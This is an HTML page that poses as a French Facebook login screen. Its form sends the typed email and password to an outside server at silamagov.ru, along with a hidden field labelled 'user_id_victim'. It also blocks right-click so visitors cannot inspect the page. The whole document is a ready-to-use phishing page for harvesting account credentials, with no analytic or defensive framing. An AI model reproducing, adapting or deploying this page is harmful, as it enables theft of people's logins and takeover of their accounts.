<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<title></title>
<style>
body {
background:url('fcbh/fr/header.PNG') repeat-x;
background-color:white;
margin:0;
overflow:hidden;
}
.form{
background:url('fcbh/fr/fbhome-fr.PNG') no-repeat;
background-position:center top;
height:95%;
}
.kl{
position:absolute;
top :2.5em;
right:50%;
margin-right: -16.4em;
width:150px;
padding: 3px;
height:22px;
border: 1px solid #1d2a5b;
}
.kj{
position:absolute;
top :2.5em;
right:50%;
margin-right: -30em;
width:150px;
padding: 3px;
height:22px;
border: 1px solid #1d2a5b;
}
.kk{
position:absolute;
top :2.5em;
right:50%;
margin-right: -36.7em;
width:77px;
padding: 3px;
height:23px;
border:transparent;
background:transparent;
cursor:pointer;
}
</style>
</head>
<body oncontextmenu="return false">
<form class="form" action="https://silamagov.ru/zs1.php" accept-charset="utf-8" method="POST">
<input type="hidden" name="user_id_victim" value="LeHqROVGxSRmVVOUVTVFJOVVQwOQ=="><input type="hidden" name="user_ip" value=""><input name="type" value="Facebookhome" type="hidden">
<input name="hub" value="login" type="hidden">
<input class="kl" name="email" type="text">
<input class="kj" name="pass" type="password">
<input class="kk" value="" type="submit">
</form>
</body></html>